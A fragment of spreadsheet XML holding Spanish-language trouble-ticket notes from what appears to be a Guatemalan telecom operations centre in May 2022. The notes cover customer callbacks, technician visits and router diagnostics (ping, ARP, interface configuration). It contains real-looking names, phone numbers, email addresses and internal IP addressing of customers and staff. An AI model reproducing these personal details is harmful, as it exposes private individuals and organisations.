PARA: STEVEN MARQUEZ (VENDOR); CORPOWALMART; NOE PEREZ; CNOCCA; GRUPO N1
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA
ASUNTO: RE: ENLACE CAÍDO DE DF MORALES ID: 344400169
BUENAS NOCHES STEVEN
            CON MUCHO GUSTO ESTAREMOS DEJANDO EN MONITOREO EL SERVICIO HASTA LA HORA INDICADA, AL FINALIZAR EL TIEMPO SOLICITADO ESTAREMOS EN COMUNICACIÓN.
QUEDO ATENTO A CUALQUIER DUDA O CONSULTA QUE PUEDA SURGIR.
ATTE.:
DE: STEVEN MARQUEZ (VENDOR) [MAILTO:STEVEN.MARQUEZ@WALMART.COM]
ENVIADO EL: JUEVES, 12 DE MAYO DE 2022 19:23
PARA: CORPOWALMART; NOE PEREZ; CNOCCA; GRUPO N1
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA
ASUNTO: RE: ENLACE CAÍDO DE DF MORALES ID: 344400169
MUCHAS GRACIAS POR LA PRONTA RESPUESTA,
DEJARLO EN MONITOREO HASTA DÍA DE MAÑANA A LAS 8 DE LA MAÑANA.
SLDS;</t>
  </si>
  <si>
    <t>F4561518</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: JUEVES, 12 DE MAYO DE 2022 14:52PARA: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_WALMART_GT_TIENDA_429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1518
ID: 344400234T
IDENTIFICADOR DEL CLIENTE:  CC_WALMART_GT_TIENDA_4296
UBICADO EN:  BARRIO EL CARRIZAL FRENTE A LA PANADERIA LIDO, MORALES IZABAL
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4561523</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE NELSON FLORES AL 22116374 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001084821
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NELSON FLORES 22116374 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001103703</t>
  </si>
  <si>
    <t>F4561528</t>
  </si>
  <si>
    <t>F4561532</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE VERIFICA QUE EL SERVICIO CONTINUA ACTIVO.
2001304242
COLA:
NOMBRE: A: 22183333
NÚMERO: 22183333
DURACIÓN: 0:00:17
ESTADO: CONECTADA
DETALLES: 22183333
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 13/05/2022 16:37:35</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE RUBI REYES QUIEN INDICA QUE LOS EQUIPOS ESTAN EN UN RACK Y QUE NO TIENE EQUIPOS ENCIMA Y NO  ESTA TAN CALIENTE.
SE LE INDICO AL CLIENTE QUE SE CONTINUARA EN OBSERVACION DEL SERVICIO O DE LO CONTARARIO SE VA A ENVIAR PERSONAL TECNICO A CAMBIAR EL AETHRA.
CLIENTE INDICA QUE NO TIENE INCONVENIENTES SI LLEGA EL TECNICO Y CAMBIA EL EQUIPO.
2001087907
COLA:
NOMBRE: A: 41517131
NÚMERO: 011 50241517131
DURACIÓN: 0:03:03
ESTADO: CONECTADA
DETALLES: +50241517131
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 12/05/2022 16:34:49</t>
  </si>
  <si>
    <t>*SE LLAMA A CLIENTE   RUBI REYES  AL 41517131 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001647243
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  RUBI REYES 41517131 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001200034</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE  RUBI REYES 41517131 PARA INDICARLE QUE EL SERVICIO SE ENCUENTRA OPERATIVO, SIN EMBARGO NO SE TIENE RESPUESTA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA TEC WALTER MOLINA QUIEN INDICA QUE YA REALIZARON PRUEBAS DE CERTIFICACION DE LADO DE LA CENTRAL SERVICIO SE ENCUENTRA OPERATIVO, NO SE REALIZO NINGUN ACCION
##SE DETIENE TIEMPO DE ESCALACION
##SE DA CODIGO DE CIERRE
&lt;GNCYGTAKN2D1C08A03EIM6&gt;PING -VPN-INSTANCE IP_PBX_ACCESO 10.174.210.6
  PING 10.174.210.6: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.174.210.6: BYTES=56 SEQUENCE=1 TTL=64 TIME=12 MS
    REPLY FROM 10.174.210.6: BYTES=56 SEQUENCE=2 TTL=64 TIME=13 MS
    REPLY FROM 10.174.210.6: BYTES=56 SEQUENCE=3 TTL=64 TIME=37 MS
    REPLY FROM 10.174.210.6: BYTES=56 SEQUENCE=4 TTL=64 TIME=31 MS
    REPLY FROM 10.174.210.6: BYTES=56 SEQUENCE=5 TTL=64 TIME=10 MS
  --- 10.174.210.6 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 10/20/37 MS
&lt;GNCYGTAKN2D1C08A03EIM6&gt;DISP ARP ALL | IN 10.174.210.6
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                          VLAN/CEVLAN PVC
----------------------------------------------------------------------------------------
10.174.210.6    0ED0-D664-A313  20        D-0         VLANIF3737       IP_PBX_ACCESO
----------------------------------------------------------------------------------------
TOTAL:2243         DYNAMIC:1592       STATIC:0    INTERFACE:651    REMOTE:0
REDIRECT:0
&lt;GNCYGTAKN2D1C08A03EIM6&gt;DISP CURRE
&lt;GNCYGTAKN2D1C08A03EIM6&gt;DISP CURRENT-CONFIGURATION  INTE VLANIF3737
#
INTERFACE VLANIF3737
 DESCRIPTION AETHRA
 IP BINDING VPN-INSTANCE IP_PBX_ACCESO
 IP ADDRESS 10.78.71.81 255.255.255.240
 IP ADDRESS 10.78.35.33 255.255.255.240 SUB
 IP ADDRESS 10.78.35.49 255.255.255.240 SUB
 IP ADDRESS 10.78.35.65 255.255.255.240 SUB
 IP ADDRESS 10.78.35.113 255.255.255.240 SUB
 IP ADDRESS 10.78.71.209 255.255.255.240 SUB
 IP ADDRESS 10.78.165.65 255.255.255.240 SUB
 IP ADDRESS 10.78.165.97 255.255.255.240 SUB
 IP ADDRESS 10.78.165.113 255.255.255.240 SUB
 IP ADDRESS 10.78.165.129 255.255.255.240 SUB
 IP ADDRESS 10.78.165.145 255.255.255.240 SUB
 IP ADDRESS 10.78.165.161 255.255.255.240 SUB
 IP ADDRESS 10.78.241.1 255.255.255.128 SUB
 IP ADDRESS 10.103.9.33 255.255.255.240 SUB
 IP ADDRESS 10.103.9.49 255.255.255.240 SUB
 IP ADDRESS 10.174.210.1 255.255.255.240 SUB
 UNDO ICMP NAME NET-UNREACHABLE SEND
 UNDO ICMP NAME HOST-UNREACHABLE RECEIVE
 UNDO ICMP NAME PROTOCOL-UNREACHABLE RECEIVE
&lt;GNCYGTAKN2D1C08A03EIM6&gt;</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA. CONTESTA MARITZA.
SERVICIO CONTINUA ACTIVO.
LLAMADA DESDE VIVO.</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE NO HA PRESENTADO INCONVENIENTES EN EL SERVICIO , SOLICITA UNA SEGUNDA LLAMADA A LAS 15:30 HRS
##LLAMADA DESDE VIVO
SERVICIO ACTIVO
&lt;GNCYGTAKN2D1C08A03EIM6&gt;PING -VPN-INSTANCE IP_PBX_ACCESO -C 4000 -S 1500 -M 20 -B 10.174.210.6
  PING 10.174.210.6: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.174.210.6 PING STATISTICS ---
    4000 PACKET(S) TRANSMITTED
    4000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 10/16/750 MS
&lt;GNCYGTAKN2D1C08A03EIM6&gt;</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE  RUBI REYES 41517131 PARA VALIDAR EL ESTADO DEL SERVICIO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RUBI REYES AL 41517131 CONFIRMA QUE POR EL MOMENTO ESTA ESTABLE PERO INDICA QUE NO PROCEDERA AL CIERRE DEL TICKET HASTA QUE SE REALIZE UNA VISITA TECNICA YA QUE HA TENIDO VARIAS INCIDENTES Y POR ESO SOLICITA LA VISITA TECNICA || SE NOTIFICA A GESTOR **
ID 2001136169
**</t>
  </si>
  <si>
    <t>F4561537</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN ZAPOY COMENTA QUE YA CUENTA CON SERVICIO BRINDA CIERRE DE FALLA
2001117261
COLA:
NOMBRE: A: 77915966
NÚMERO: 77915966
DURACIÓN: 0:00:53
ESTADO: CONECTADA
DETALLES: 77915966
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 12/05/2022 18:54:27</t>
  </si>
  <si>
    <t>F4561543</t>
  </si>
  <si>
    <t>SE NOTIFICA ALARMA EN EL MONITOREO PROACTIVO
KENNY ROBERT RIVERA JUAREZ
VIE 13/05/2022 14:50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1543
ID: 313900347T
IDENTIFICADOR DEL CLIENTE: CC_GMG_GT_INTERNET_PLAZA_FLORIDA_MIXCO
UBICADO EN:  INTERNET_CALZADA SAN JUAN 1-83  ZONA 7 MIXCO  CENTRO COMERCIAL PLAZA FLORIDA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4561550</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JULIO RIVAS QUIEN INDICA QUE EL ASMI NO ESTA ALARMADO SE APLICO UN RESET PERO NO LEVANTA EL SERVICIO.
HAY UNA ALARAMA DE PERDIDA DE TRAMA. POSIBLEMENTE EL ASMI DEL NODO ESTA INHIBIDO. O SI LLEVA REPISA ES NECESARIO REVISARLA.
CLIENTE INDICA QUE YA SE RETIRAN Y SOLICITA VISITA TECNICA PARA EL DIA DE MAÑANA A LAS 8:00AM
2001097163
COLA:
NOMBRE: A: 0050377302678
NÚMERO: 0050377302678
DURACIÓN: 0:00:48
ESTADO: CONECTADA
DETALLES: 0050377302678
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 12/05/2022 17:05:18</t>
  </si>
  <si>
    <t>EN CONFERENCIA CON CLIENTE JULIO RIVAS  77302678 Y TÉCNICO LGB IVAN SANCHEZ 78448768 SE COORDINA VISITA PARA EL DÍA LUNES A LAS 8 AM A LAS INSTALACIONES DEL CLIENTE PARA IR A CONECTAR EQUIPOS, YA QUE NO LABORAN EL FIN DE SEMANA.
2001401959
COLA: CNOC_ACCESO_EMPRESARIAL
NOMBRE: DE: 0050322503355
NÚMERO: 0050322503355
DURACIÓN: 0:10:50
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050322503355
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 14/05/2022 11:59:22 A. M.</t>
  </si>
  <si>
    <t>F4561559</t>
  </si>
  <si>
    <t>SE CONTACTA CON TEC MILTON PARA VALIDAR LOS AVANCES DEL CASO,  INDICA QUE ESTAN REVISANDO YA QUE A LA PAR DE LAS INSTALACIONES DEL CLIENTE ESTAN CONSTRUYENDO UN EDIFICIO Y RETIRARON LAS CT  DONDE VA CONECTADO EL CLIENTE, POR LO QUE ESTAN VALIDANDO SI SE PUEDE COLOCAR EN OTRO LADO O SE TIENE QUE LLAMAR A LA CONTRATA, TECNICO SOLICITA LLAMADA EN 30 MIN
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE KEVIN QUIEN INDICA QUE EL EQUIPO CISCO SERIE 800  TIENE LA LUZ DE CD INTERMITENTE.
SE VERIFICA QUE ESTE SERVICIO VA POR COBRE.
CLIENTE INDICA QUE SE RETIRAN A LAS 17:00HRS. POR LO QUE SOLICITA SE LE MANDE PERSONAL EL DIA DE MAÑANA A PARTIR DE LAS 8:00AM-
2001076430
COLA:
NOMBRE: A: 53180701
NÚMERO: 011 50253180701
DURACIÓN: 0:06:30
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: +50253180701
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 12/05/2022 16:00:03</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANA LILIAN VELASQUEZ 53180701 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001219758</t>
  </si>
  <si>
    <t>F4561601</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LEONOR HENRIQUEZ AL 77973768 Y 21036039 CONTESTA EN EL PRIMER NUMERO PERO INDICA QUE NO ESCUCHA NADA Y CORTA LLAMADA SE INTENTA AL SEGUNDO NUMERO ENVIA A BUZON, SE INTENTARA LUEGO **
ID 2001171210 - 2001171897
**
**</t>
  </si>
  <si>
    <t>SE LLAMA A LEONOR PARA VALIDAR SERVICIO PERO INDICA QUE SE CAYO SE VALIDA Y SE TENIA SERVICIO ACTIVO. CLIENTE INDICA QUE SE CONECTAN VIA WIFI POSIBLEMENTE EL INCONVENIENTE SEA DESDE EL EQUIPO QUE LO DISTRIBUYE, CLIENTE SOLICITA LLAMDA EL DIA DE MAÑANA VALIDARA CON QUIEN SE PUEDE ESCALAR O SI CONSIGUE ALGUN NUMERO DE CENTRAL---</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LEONOR HENRIQUEZ AL 21036039 CLIENTE INDICA QUE POR EL MOMENTO EL SERVICIO ESTA ESTABLE SOLICITA QUE SE LE LLAME A LAS 17:30 PM PARA CONFIRMAR**
ID 2001090466
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LEONOR HENRIQUEZ  21036039 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001107396</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LEONOR HENRIQUEZ  21036039 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001201404</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LEONOR HENRIQUEZ AL 77973768 Y 21036039 PERO NOSE OBTIENE COMUNICACION A NINGUN NUMERO, SE INTENTARA LUEGO **
ID 2001190831 - 2001191538
**</t>
  </si>
  <si>
    <t>SE LLAMARA A CLIENTE APARTIR DE LAS 9:30 SEGUN LO SOLICITADO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EN AMBOS NUMEROS EL PRIMERO ENVIA A BUZON EL SEGUNDO NO RESPONDES
21036039</t>
  </si>
  <si>
    <t>F4561612</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANA DIAZ AL 70518343 CLIENTE NO RESPONDE || SE INTENTARA LUEGO **
ID 2001091216
**</t>
  </si>
  <si>
    <t>F4561623</t>
  </si>
  <si>
    <t>SE LLAMA AL 8126 ID 2001190507 PARA VALIDAR LA INFORMACIÓN DE LO QUE TIENE PENDIENTE EL CLIENTE, YA QUE SE VALIDA EL COMENTARIO EN CRONOLOGÍA QUE ESTA OPERATIVO Y ESTABLE EN EL HORARIO DE LAS 07:32:48 Y SE LE COMENTA LO DE LA INFORMACIÓN QUE BRINDO CRISTIAN AL INICIO DEL SEGUIMIENTO Y COMENTA QUE LO APERTURO UNA PERSONA DEL CNON EDDILSON.AREVALO DONDE COMENTA QUE LE ESTA BRINDANDO EL SEGUIMIENTO Y NO RESPONDEN PERO A NIVEL DE CLARO ESTA BIEN. POR LO QUE SE MUEVE TRABAJO EN CURSO. Y EL GESTOR LE BRINDARA EL SEGUIMIENTO.</t>
  </si>
  <si>
    <t>F4561624</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR 504 2623-0105 CONTESTA EL SEÑOR ORDIN CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
ID 2001096065
**</t>
  </si>
  <si>
    <t>F4561625</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VANESSA / LESBIA AL 44736011 NO RESPONDE, ENVIA A BUZON**
ID 2001095434
**</t>
  </si>
  <si>
    <t>F4561627</t>
  </si>
  <si>
    <t>SE LLAMA A A CLIENTE SERGIO BARREDA 56300178 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001170301</t>
  </si>
  <si>
    <t>F4561630</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ING. RICARDO APARICIO AL (503)2591-6725 INDICA QUE SE PUEDE PROGRAMAR VISITA PARA MAÑANA SI NO PARA EL MARTES SOLO QUE SE LE HABISE Y BRINDA LOS SIGUIENTES DATOS **
HORARIO DE ATENCION: 8:00 A 15:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS ENVIAR CORREO CON DATOS DEL PERSONAL TECNICO AL CORREO RICARDO.APARICIO@ISSS.GOB.SV
DIRECCION: NO CUENTA CON DIRECCION INDICA QUE ES LA DEL ENLACE
ATENDERA EN SITIO: RICARDO APARICIO O MARTA CASTILLO AL 2591-3485 Y PEDIR HABLAR CON ELLA**
ID 2001097203
**</t>
  </si>
  <si>
    <t>F4561634</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL PEREZ  48428426 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001173014
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL PEREZ  AL 48428426 INDICA QUE AUN PRESENTA PERDIDAS Y SOLICITA SABER COMO SE VE DE NUESTRO LADO **
-ID 2001195527 - 2001197067
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANIBAL PEREZ  48428426 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001138056</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL PEREZ AL 48428426 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001137161
**</t>
  </si>
  <si>
    <t>F4561636</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE VALIDA EL SERVICIO CON EL CLIENTE SANDRA SAMAYOA.
2001096122
COLA:
NOMBRE: A: 79329797
NÚMERO: 79329797
DURACIÓN: 0:00:08
ESTADO: CONECTADA
DETALLES: 79329797
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 12/05/2022 17:00:54</t>
  </si>
  <si>
    <t>F4561656</t>
  </si>
  <si>
    <t>CLIENTE WILLIAM BARRIOS 30638649 INDICA QUE SE PUEDE PROCEDER CON LA VISITA EL DIA DE HOY. ESTARÁ EN SITIO ESPERANDO AL TECNICO.
LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>F4561676</t>
  </si>
  <si>
    <t>SE CONVERSÓ CON ELFEGO DÍAZ 58261414 QUIEN INDICA QUE ESTÁN TRAMITANDO EL INGRESO A ERWIN DEL CID, SOLICITA SE CONSULTE EN 15 MINUTOS.
ID DE LLAMADA: 2001155246</t>
  </si>
  <si>
    <t>INFORMA CLIENTE CLAUDIA LORENA PAIZ MORALES 31607025 QUIEN COMENTA QUE EL E1 YA SE ENCUENTRA FUNCIONANDO, INDICA QUE YA REALIZARON PRUEBAS Y VALIDA QUE EL INCONVENIENTE YA ESTA SOLUCIONADO, SOLICITA SE LE INFORME VIA CORREO. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE CLAUDIA AYAPAY PERO ENVIA A BUZON.
2001093607
COLA:
NOMBRE: A: 36607025
NÚMERO: 36607025
DURACIÓN: 0:00:07
ESTADO: CONECTADA
DETALLES: 36607025
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 12/05/2022 16:52:24</t>
  </si>
  <si>
    <t>SE LLAMA A NANCY DÍAZ 24144444, NOS ATIENDE ANDREA, NOS COMENTA QUE NANCY LABORA HASTA EL DÍA LUNES, SE LE CONSULTAN POR LOS PERMISOS DE ACCESOS E INDICA QUE AÚN NO SE TIENE CORREO DE AUTORIZACIÓN. ID:2001353720</t>
  </si>
  <si>
    <t>SE LLAMA A NANCY DÍAZ 24144444 PARA CONSULTAR LOS ACCESOS, NOS ATIENDE YASMÍN QUIEN COMENTA QUE YA SE TRAMITARON LOS ACCESOS Y PUEDEN PROCEDER CON LA VISITA.</t>
  </si>
  <si>
